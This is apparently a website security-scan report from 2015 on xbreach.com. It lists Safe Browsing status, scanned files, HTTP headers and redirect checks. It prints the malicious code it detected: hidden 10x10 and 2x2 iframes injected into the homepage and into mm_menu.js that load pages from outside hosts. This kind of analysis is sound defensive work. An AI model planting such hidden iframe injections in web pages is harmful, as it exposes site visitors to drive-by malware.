Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xbreach.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://xbreach.com/ | 200 OK Content-Length: 15995 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://lhortahogar.comule.com/counter.php <iframe src="http://lhortahogar.comule.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://xbreach.com/mm_menu.js | 200 OK Content-Length: 30894 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://awlstyle.com/awwd.html?j=1450520></iframe>');
function Menu(label, mw, mh, fnt, fs, fclr, fhclr, bg, bgh, halgn, valgn, pad, space, to, sx, sy, srel, opq, vert, idt, aw, ah) { this.version = "020320 [Menu; mm_menu.js]"; this.type = "Menu"; this.menuWidth = mw; this.menuItemHeight = mh; this.fontSize = fs; this.fontWeigh var par = img; var lastOffset = 0; while(par){ if( par.topMargin && !onWindows ) y += parseInt(par.topMargin); if( (par.offsetTop != lastOffset) && par.offsetTop ) y += parseInt(par.offsetTop); if( par.offsetTop != 0 ) lastOffset = par.offsetTop; par = macIE45 ? par.parentElement : par.offsetParent; } } else if (img.y >= 0) y += img.y; return y; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://awlstyle.com/awwd.html?j=1450520 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://awlstyle.com/awwd.html?j=1450520> | ||
http://millerusa.net/800559.js | 404 Not Found Content-Length: 9 Content-Type: text/html | clean |
http://millerusa.net/test404page.js | 404 Not Found Content-Length: 9 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xbreach.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 10:54:08 GMT
Accept-Ranges: bytes
ETag: "24a0f96-3e7b-4eca86987a200"
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.37 mod_bwlimited/1.4
Content-Length: 15995
Content-Type: text/html
Last-Modified: Tue, 03 Dec 2013 21:59:36 GMT
...15995 bytes of data.
GET / HTTP/1.1
Host: xbreach.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 10:54:08 GMT
Accept-Ranges: bytes
ETag: "24a0f96-3e7b-4eca86987a200"
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.37 mod_bwlimited/1.4
Content-Length: 15995
Content-Type: text/html
Last-Modified: Tue, 03 Dec 2013 21:59:36 GMT
...15995 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: xbreach.com
Referer: http://www.google.com/search?q=xbreach.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xbreach.com
Referer: http://www.google.com/search?q=xbreach.com
Result:
The result is similar to the first query. There are no suspicious redirects found.